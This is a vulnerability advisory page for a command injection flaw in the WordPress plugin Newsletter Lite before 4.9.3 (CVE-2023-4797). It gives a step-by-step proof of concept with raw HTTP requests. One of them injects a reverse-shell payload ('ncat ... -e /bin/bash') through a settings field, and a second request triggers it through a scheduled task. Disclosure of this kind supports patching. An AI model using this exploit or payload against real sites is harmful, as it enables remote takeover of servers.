Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitKarolis NarvilasWPEX-ID:DE169FC7-F388-4ABB-AB94-12522FD1AC92
HistoryOct 05, 2023 - 12:00 a.m.

Newsletter Lite < 4.9.3 - Admin+ Command Injection

2023-10-0500:00:00
Karolis Narvilas
34
command injection
remote code execution
http parameter
scheduled tasks
arbitrary command execution

7.5 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

19.0%

JSON

Description The plugin does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.

[1] Navigate to "Newsletters > Configuration > History & Emails Configuration"

======================

[2] Submit RCE Payload within "Archive Older Than" Field & Save Settings. The payload must be in HTTP parameter "emailarchive_olderthan" and escaped with backticks in format ` <PAYLOAD> `#, as shown below:

POST /wp-admin/admin.php?page=newsletters-settings HTTP/1.1
Host: 192.168.178.130
Content-Length: 13688
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.178.130
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5lVCjZQhpa9vBS0n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

-- SNIP --

------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="emailarchive_olderthan"

` ncat 192.168.1.127 -e /bin/bash `#
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="theme_folder"

default2
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles[]"

newsletters-bootstrap
------WebKitFormBoundary5lVCjZQhpa9vBS0n
Content-Disposition: form-data; name="loadstyles_handles[newsletters-bootstrap]"

-- SNIP --

======================

[3] Trigger the Payload by Navigating to Newsletters > Configuration > Scheduled Tasks > Email Archiving , then click "Run Now". The below GET request will be issued:

GET /wp-admin/admin.php?page=newsletters-settings-tasks&method=runschedule&hook=newsletters_emailarchivehook HTTP/1.1
Host: 192.168.178.130
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.178.130/wp-admin/admin.php?page=newsletters-settings-tasks&wpmlupdated=true&wpmlmessage=Task+has+been+executed+successfully%21
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

======================

[4] The user's input will then be unsafely passed to PHP's exec() function, resulting in arbitrary command execution.

Related

wpvulndb 1
prion 1
nvd 1
cve 1
cvelist 1
wpvulndb
wpvulndb
Newsletter Lite < 4.9.3 - Admin+ Command Injection
2023-10-05 00:00:00
prion
prion
Sql injection
2024-01-16 16:15:00
nvd
nvd
CVE-2023-4797
2024-01-16 16:15:13
cve
cve
CVE-2023-4797
2024-01-16 16:15:13
cvelist
cvelist
CVE-2023-4797 Newsletter Lite < 4.9.3 - Admin+ Command Injection
2024-01-16 15:56:40

7.5 High

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

19.0%

JSON
Related for WPEX-ID:DE169FC7-F388-4ABB-AB94-12522FD1AC92
wpvulndb1prion1nvd1cve1cvelist1